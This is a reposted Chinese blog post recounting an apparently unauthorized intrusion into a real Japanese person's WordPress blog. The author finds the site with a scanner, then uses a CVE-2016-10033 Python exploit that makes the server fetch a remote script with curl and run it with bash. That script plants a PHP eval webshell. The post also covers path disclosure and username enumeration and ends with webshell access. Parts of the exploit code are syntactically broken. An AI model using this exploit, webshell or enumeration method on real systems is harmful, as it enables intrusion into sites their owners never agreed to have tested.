对日本某Wordpress博客站的一次渗透测试

admin
admin
admin
101095
文章
87
评论
2022年5月23日11:01:02评论211 views字数 2245阅读7分29秒阅读模式

阅读本文大概需要 2.3 分钟

今天,又是忙碌且充实的一天。

下班回到家的我,又在用 FOFA 扫网站,然后便扫到一个日本网友的博客站点。这界面风格,一看就是 Wordpress 了,网站底部也可以看到 Wordpress 的字样。

只有寥寥无几的博文,并且最近一条还是在 3 年前。

对日本某Wordpress博客站的一次渗透测试

我浏览器装了 Wappalyzer 插件,插件显示了如下信息。

对日本某Wordpress博客站的一次渗透测试

4.5.3 ?这是好久以前的版本了,看来博主确实很久没打理这个网站了。

不过看到这个版本号,我顿时来了精神了。因为我想起 Wordpress <= 4.6 有个经典的任意命令执行漏洞(CVE-2016-10033)。

立马找到我以前写的笔记,一顿翻找,不一会儿就找到了曾经用过的一个 exp。

#!/usr/bin/env python3
import requests
import sys

wordpress's url
target = 'http://127.0.0.1' if len(sys.argv) < 1 else sys.argv[1]
# Put your command in a website, and use the website's url
# don't contains "http://", must be all lowercase
shell_url = 'example.com/1.txt' if len(sys.argv) < 2 else sys.argv[2]
# an exists user
user = 'admin'

def generate_command(command):
    command = '${run{%s}}' % command
    command = command.replace('/''${substr{0}{1}{$spool_directory}}')
    command = command.replace(' ''${substr{10}{1}{$tod_log}}')
    return 'target(any -froot@localhost -be %s null)' % command


session = requests.session()
data = {
    'user_login': user,
    'redirect_to''',
    'wp-submit''Get New Password'
}
session.headers = {
    'Host': generate_command('/usr/bin/curl -o/tmp/rce ' + shell_url),
    'User-Agent''Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
}
session.allow_redirects = False
target += '/wp-login.php?action=lostpassword'
session.post(target, data=data)

session.headers['Host'] = generate_command('/bin/bash /tmp/rce')
session.post(target, data=data)

简单讲一下上面的代码。

target 是目标网站,shell_url 则是要执行的命令文件的地址,并且这个地址必须是目标网站所在的机器可以访问到的,user 则是当前网站存在的用户名

target 目前已知,那么我还需要构造 shell_url,并且需要得到一个有效用户名。

首先来构造 shell_url

创建 1.txt,写入如下的命令,该命令会在指定目录写入一句话木马。

echo '<?php @eval($_POST["cmd"]);?>' > /var/www/html/1.php

上面的命令指定将木马 1.php 写到 /var/www/html/ 下。而我现在要将木马写到网站根目录,但是我并不确定网站根目录是否为 /var/www/html/。

这时想起之前看到 Wordpress 有绝对路径泄露漏洞,访问 /wp-admin/admin-functions.php,显示如下。

对日本某Wordpress博客站的一次渗透测试

当前网站根目录确实是在 /var/www/html/。

1.txt 放到本地服务器,再使用内网穿透,将本地服务器映射到公网,使得目标机器可以访问到。

输入公网地址访问测试,成功访问。

对日本某Wordpress博客站的一次渗透测试

接下来获取网站用户名

网站域名是 mxxxxblog.com,所以猜测用户名为 mxxxx,进入登录页面进行测试。

对日本某Wordpress博客站的一次渗透测试

用户名输入 mxxxxx,密码随便,提示密码错误。

随便输一个用户名。

对日本某Wordpress博客站的一次渗透测试

提示用户名不存在。(看不懂日语,翻译的)

至此得到用户名。

修改 exp

将 target、构造的 shell_url 和得到的用户名替换到 exp 中,最终 exp 如下。

对日本某Wordpress博客站的一次渗透测试

执行 exp

直接 python 执行,没有任何输出。猜测应该是执行成功了。

直接使用蚁剑连接,成功连接。

对日本某Wordpress博客站的一次渗透测试

至此已经拿到 WebShell,不打算再往下了。

结语

其实这次渗透并不算难,基本就是一个 RCE 利用。主要还是目标网站所使用的的系统太老了。

在这里我想对大家说,有些事情其实没你想的那么难。你可以觉得难,但千万不要因为难就不去做,不愿意尝试。

希望大家共勉,加油!

原文始发于微信公众号(白帽渗透笔记):对日本某Wordpress博客站的一次渗透测试

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月23日11:01:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   对日本某Wordpress博客站的一次渗透测试http://cn-sec.com/archives/946277.html

发表评论

匿名网友 填写信息